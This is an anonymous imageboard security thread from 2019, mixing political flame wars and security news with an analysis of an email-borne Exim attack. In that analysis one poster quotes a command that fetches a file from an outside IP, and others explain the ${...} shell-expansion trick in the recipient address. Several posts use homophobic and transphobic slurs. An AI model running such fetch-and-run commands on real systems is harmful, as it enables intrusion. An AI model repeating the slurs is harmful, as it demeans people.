So now your private keys get encrypted with a random value that is large enough to run into bit error rates in RAMBleed attacks.
Landon Howard
I know this is a larper thread, but that's some super-tranny picture out here.
Adrian Green
>muh pol boogeyman God, you faggots are literally all the same
Xavier Flores
Are you a libertardian? A Nazi? Do you support Trump?
Brody Lewis
A pride flag would've been less gay than that pic. OP is a faggot, as usual.
Gavin Evans
You don't shit about living in a repressive government. Your six rules are laughable. RESIST! oh please have you ever lived in vietnam? What about the Philippines? China maybe? Your advice is useless and stupid. All you are is an egalitarian extremist who is spiritually and emotionally bankrupt. Your policies and ideals are what cause tyrants to come to power.
This edgy hacking for politics meme needs to die. Hacking is about the pursuit of your passion of building and breaking technology. Your worse then the script kiddies of the 90s that were constantly begging for irc bots and to fix an exploit that was released broken to prevent kids from using it. The fact your taking over this space and pushing politics into it is the reason my passion is deing. You've ruined defcon, you shut down derby con, you've ruined most firms corporate environment. I hope you end up like the fag hammond and end up in prison for being a faggot.
Evan Mitchell
Damn we're off to a great start.
What benefits does Iran reap in fighting the US in a full on war? If they can be enough of an adversary to gain some autonomy, this makes sense. I know Bolton was yammering about offensive cyber attacks in economic sectors, but who else would we piss off by targeting Iranian commerce?
>but who else would we piss off by targeting Iranian commerce? Countries in Europe and Russia. Iran is mostly Shia Muslim, so they won't have a shitload of jihadis pouring in, like what happened in Iraq.
In fact, most of the Muslim world is Sunni and detests Iran. We'd win easily.
Grayson Ward
>observe how the cancer known as Jow Forumstard invade other boards
top kek, these threads used to filled with somewhat nice discussions.
Brody Walker
TBQH I'm surprised there hasn't been a Stuxnet 2: PLC Boogaloo, it's not like alphabet agencies are too classy to pull the same gig twice.
>Is this war with Iran? Disabling systems is usually done as a precursor to offensive actions, but this seems to be something else. It is hard to get facts. So called "analysis" in newspapers here have decided it all started by the US blaming Iran for alleged damages to oil tankers. I don't think we will get much credible information from the press.
Merely a threat of war will up the oil price, a lot. Anyway, in war the leaders always get the safest, deepest bunkers.
>Iran is mostly Shia Muslim That is what Iranian leaders claim. the exile Iranians say a lot are Zoroastrians. And there is a tension between the Islamic leaders and the not so Islamic people. A war, one the other hand, will unite the country. Finding a common external enemy is an old trick, even the Argentinians tried that with the UK.
Now that tension is building we might get to see if "revolution in military affairs" (RMA) is still alive, definitely a /cyb/ angle.
Jonathan Harris
=== /sec/ News: >USING A SOFTWARE DEFINED RADIO TO SEND FAKE PRESIDENTIAL ALERTS OVER LTE rtl-sdr.com/using-a-software-defined-radio-to-send-fake-presidential-alerts-over-lte/ >Their research showed that four low cost USRP or bladeRF TX capable software defined radios with 1 watt output power each, combined with open source LTE base station software could be used to send a fake Presidential Alert to a stadium of 50,000 people.
Daniel Richardson
There is usually a bit of noise in the early stages, before the thread is made comfy again. Last thread was good, this will be too.
I am trying to drill down on information on /cyb/ angles of what happens wrt. Iran, but hard facts are hard to come by.
Wyatt Williams
Resist? You can't resist the urge to piss your pants everything something doesn't go your god damned way, you lanky fucks. You won't even show your faces because you're spineless cowards. Every god damned corporation and authority backs you up because you're thick as pig shit. You have more of a voice than anything else, you're overrepresented and constantly justified and victimized. Sit down, enjoy your lattes, grow the fuck up and get a job you pathetic pieces of shit. Go do something valuable for someone else for once in your god forsaken lives.
Lincoln Evans
Cyberpunk mask being made over at
Adam Reyes
>and get a job I already have a job, and I have had it for years. >Go do something valuable for someone else for once in your god forsaken lives. >We made a couple of FAQs, rather extensive. Have you read any of them?
Owen Jackson
=== /sec/ News: >How Verizon and a BGP Optimizer Knocked Large Parts of the Internet Offline Today tech.slashdot.org/story/19/06/24/213234/how-verizon-and-a-bgp-optimizer-knocked-large-parts-of-the-internet-offline-today Just how often do we have to endure BGP problems?? >For nearly three hours, network traffic that was supposed to go to some of the biggest online names was instead accidentally rerouted through a steel giant based in Pittsburgh. More than 20,000 prefixes -- roughly two per cent of the internet -- were wrongly announced by regional U.S. ISP DQE Communications: this announcement informed the sprawling internet's backbone equipment to thread netizens' traffic through one of DQE's clients, steel giant Allegheny Technologies, a rerouting that was then, mindbogglingly, accepted and passed on to the world by Verizon, a trusted major authority on the internet's highways and byways. And so, systems around the planet automatically updated, and connections destined for Facebook, Cloudflare, and others, ended up going to Allegheny, which black holed the traffic.
Who fear Iranian computer forces when you have gonzos with BGP privileges?
Hudson Davis
Someone knows how show my cellphone screen in the pc by USB?
Owen Kelly
Surprised they didn't block Veritas project on Google searches yet. GAF and infichan were literally removed overnight.
James Collins
This didn't look good and the weak back pedalling makes it look even worse. This will provide fertile grounds for conspiracy stuff. It will also inevitably bring up the question if Google is too big for itself.
What's the best email provider if I actually care about privacy/being able to send encrypted emails? I know proton was the go to for a long time, but I've heard it's potentially compromised now. Can't host my own right now, any suggestions?
Aiden Gray
>muh socialist boogeyman You're the one who saw a picture pertaining to authoritarianism and assumed it was about Bernie, ya fucking cuck-victim. Go cry to the other idiots on your Jow Forums safe space.
Owen Sanders
>6 rules for how to get killed under authoritarian power
John Turner
Security Operations and Forensics Elasticsearch/Logstash/Kibana.
Cooper Miller
if the power's authoritarian they don't need excuses.
Levi Cruz
Nah, they usually don't care about you as long as you look like a good citizen and go unnoticed.
Gabriel Gomez
not caring doesn't mean not spontaneously murdering, collateral damage is one of the big things bill of rights covers.
Sebastian Rivera
It's possible but under authoritarian power you're 90% more likely to survive if you keep a low profile than if you oppose the state.
Austin Young
not seeing it. assuming you don't get murdered/starved out by your own government, you're still fucked by any other government intervention.
Josiah Allen
Baded and truthpilled!
Ayden Nelson
Wait what happened to derbycon
Samuel Cox
i'm sure cyberpunk and resisting authority are not at all aligned. thanks for your insightful post, fren. btw, is hacking legal?
Nathan Bennett
I think the FCC lets you go up to 2 watts without a license, but it's no surprise they are doing this without any hard authentication built in.
Jack Lopez
Cyberwar has already started. I thought 5th domain was CYBER? Don't we have a cyber CENTCOM now? Do you need Congressional approval to launch cyber attacks? The weird part is they are announcing that they attacked Iran and disabled their military systems. Why would you do that unless it was part of a bluff?
Jacob Price
use a normal big name provider and use pgp/smime/gpg. tutanota and hushmail are ok, but as long as you use tor or some other vpn then protonmail is fine.
Luke James
>not reading the "true Americans" and figuring out that it's not a guide for every country
shiggy diggy do
Juan King
Something to add to the /sec/ FAQ?
Josiah Williams
Nobody except seething Jow Forumsshits ever post this, Jow Forums isn't your personal hugbox
Isaac Davis
Can we got an apolitical thread please? Why are you purposely stirring shit?
Joshua Sanchez
its common disinfo tactics
Thomas Hall
we are very punk around these parts
Nathan Cook
so what is that all about im not gonna read all that shit
Robert Long
Security Onion, AlienVault and SOF-ELK? Anyone else have suggestions for things like opnSense or IPFire or Smoothwall? Suricata versus Snort? IP ban lists like Dan's Guardian? Open source threat intelligence feeds?
Does someone need to do a full guide on how to harden your home network?
Mac users eternally BTFO. How will they ever recover?
Andrew James
>iTardler anything top jej, mac weenies are too woke for malware
Benjamin Diaz
>page 10 bump right in time
Cooper Evans
Ok so anyone interested or should this thread die so a new one with a better (numoot) picture can be made?
Hunter Brown
Are you offering to share a guide? Please do once this dumb thread dies
Adrian Lopez
who here works in cybersec? I'm looking to start from nothing.
Easton Bailey
This seems as good a place as any to post this. >user.org/user.net were my domains, the payload is just the initial TO address.
I got an interesting email yesterday: Return-Path: Delivered-To: Received: from mail.user.net by user.net (Dovecot) with LMTP id Cv+uM4y2hjGdJ54xNvUUQ for ; Wed, 26 Jun 2019 00:04:28 +0000 Received: from user.org (mail.user.org [294.265.532.320]) by mail.user.net (Postfix) with ESMTP id A91CE8020F for ; Wed, 26 Jun 2019 00:04:28 +0000 (UTC) Authentication-Results: mail.user.net; dkim=permerror (bad message/signature format) Received: from 0kb.com (hostnextra.com [216.245.211.170]) by user.org (Postfix) with SMTP id BF7488212F91 for ; Wed, 26 Jun 2019 00:00:21 +0000 (UTC) Received: 1 Received: 2 Received: 3 Received: 4 Received: 5 Received: 6 Received: 7 Received: 8 Received: 9 Received: 10 Received: 11 Received: 12 Received: 13 Received: 14 Received: 15 Received: 16 Received: 17 Received: 18 Received: 19 Received: 20 Received: 21 Received: 22 Received: 23 Received: 24 Received: 25 Received: 26 Received: 27 Received: 28 Received: 29 Received: 30 Received: 31
Jace Carter
>Smoothwall I used this (until a hardware failure) but the distribution is getting rather old and updates are sparse. Are there any better firewalls with deep packet inspection out there?
Smoothwall uses Snort but I am not sure if the rules are automatically updated.
>Does someone need to do a full guide on how to harden your home network? Yes please, that would be appreciated.
Lincoln Hill
Page 8 brothers.
Easton Jones
Is there a hacking tool you're astonished isn't available for free/freely?
Not sure why so quiet here, perhaps the excitement with 3 - 4 parallel threads on Raspberry Pi 4 is taking all the attention. Meanwhile:
=== /cyb/ News: >Robots To Take 20 Million Jobs, Worsening Inequality, Study Finds (france24.com) hardware.slashdot.org/story/19/06/25/2224258/robots-to-take-20-million-jobs-worsening-inequality-study-finds >Robots have already taken over millions of manufacturing jobs and are now gaining in services, helped by advances in computer vision, speech recognition and machine learning, the study noted. In lower-skilled regions, job losses will be twice as high as those in higher-skilled regions, even in the same country, the study concluded. According to the latest study, the current wave of "robotization" is likely ultimately to boost productivity and economic growth, generating roughly as many new jobs as it destroys. At the high end of the forecast, the researchers see a $5 trillion "robotics dividend" for the global economy by 2030 from higher productivity.
It is not made clear in any discussions I have seen if the rate of loss of jobs (and entire occupations) will be offset by creation of new jobs and occupations. There is a lot of hand waving in that regard. Also it is unclear how much further this will erode the middle classes.
I don't think that would work with the servers I know
Julian Bennett
>wget 65.181.120.163/stfinracu it's... nothing. and i'm a little bit disappointed
Carter Diaz
My guess is that it hopes that email addresses will be processed in a shell script and that therefore, $(...) will get included in some sort of ".." in a shell script.
It probably went out to 2billion servers and has already been shutdown, I got it yesterday. I could be wrong though.
Could be that the "stfinracu" isn't a file but a unique token and they want the access logs and consequently, they'll hit my server again now that you've "proved" that I'm vulnerable and this time include a real payload. I'll come look for a /sec/ thread again if I get another one.
Aiden Davis
>root+${...}@... They want root to receive the email and run it through some sort of shell script.
Carter Hill
Oh right it makes sense.
Btw lets have a moment to rant about how fucked up mail serving is.
Gabriel Cruz
someone on the radio suggested email was the best invention, and i lol'd out loud
Jayden Nelson
It's not really the mail server (probably).
So, myemail+*@ is a very common construction to have in your mail aliases. Therefore, root+$(payload)@ ought to get sent to root for pretty many servers. You'd divide shit up so that a given daemon would send mail to root+DaemonName@localhost
The thing is, if you're a lazy admin and your root account gets a billion emails from cron jobs and shit, you might run it through a shell script to sort shit out, dump some things, have other emails trigger log rotation or other jobs or whatever. You'd literally write a shell script that checked for SpecialDaemonName in the email address and then do something and if that test was done inside "" then wham, the ${payload} gets evaluated.
I do this with Sieve rules so I'm probably safe but some admins might roll their own, especially if they want certain emails to trigger jobs. Like, they want to be able to trigger a backup by emailing [email protected] or bounce their minecraft server the same way.
Jacob Brooks
keks
thats a clever hack for people asking to be hacked. also when i speak about mail server, Its more about the mail system in general. Its like a system that should be dead years ago but we keep adding stuff for it not to collapse.
>Its like a system that should be dead years ago but we keep adding stuff for it not to collapse. Anything that is proposed to replace it is proprietary so nobody ever agrees to it. Encrypted-by-default email would be the single most necessary thing. We can talk about HELO and the rest of it later.
David Sanchez
Encrypted by default AND The abilty for it to be decentralized.
> fuck eloh :D
Christian Miller
you think thats bad, you can put ; or $()/`` literals in filenames.
Cooper Butler
lol thats true, I remember pwning myself with that kind of shit and not being ablee to delete the fucking file for like a year (before I mess up for real while playing with ext3 shit and destroying everithing :D )
>decentralized Email already is decentralised, you can totally run your own server and it doesn't need anything upstream except for DNS itself (which is also more or less decentralised.
>theres a reason find has a -delete action That's an old friend, more for /tmp directories so full of shit that "rm *" fails from over expansion.
Brayden Gonzalez
I was 17 and find was like magic to me (still kind of is tho :D)
Basically, it's like we thought, the code is expanded but it happens inside Exim itself and doesn't require a lazy admin. Patch, Update or switch to Postfix.
Caleb Sullivan
Just a reminder of open issues with the /cyb/ FAQ. Anyone got some inputs?
help me out here, I recently stood up a webserver and getting hits from ips, I have http forwarding to https
I see in the logs that most of these are getting redirected, but not accessing the site, for the 200 code, so are they accessing it at all or as soon as they are redirected, the connection drops?
Also the ips that do get 200 code from the redirection, what are they doing?
It's just a personal site for my resume btw, no service hosting or anything like that
Do you think any of the anti-Big Tech stuff in Congress will put an end to the reign of Zuck? Libra is gonna be a nightmare as the big players back it.
>Do you think any of the anti-Big Tech stuff in Congress will put an end to the reign of Zuck? Libra is gonna be a nightmare as the big players back it. Yes. In fact probably a large part of Congress regret letting FAANG grow this big. And unfortunately for them FAANG has indubitably a lot of dirt on them that not even the alphabet soup agencies know about. So now it is too late.
Anthony Ross
You really think they have enough dirt on all of Congress that they won't be regulated? I know the banks do.
Daniel Scott
>Is this war with Iran? US started with acts of war against them first. the sanctions are starving their people and economy
anybody have good ip/domain tools that can look up history and other info? domaintools.com went commercial.
Daniel Lewis
those are some great rules to get noticed and killed you should read about repressive govts all over the world. as soon as they know your name, you'll be "disappeared" (for example, read about the "school of americas" and the "plan condor", where they taught repressive right wing govts to track down leftists all over latin america). and these days, with all the tech we have, it's even easier for govts to find you...
>What benefits does Iran reap in fighting the US in a full on war? why is this even a question? *the US* is threatening Iran with war, and not the reverse.
adb networking + VNC?
Bentley Jackson
lol, americans TAUGHT repressive govts... it wouldn't take long for them to start doing the same to their own population.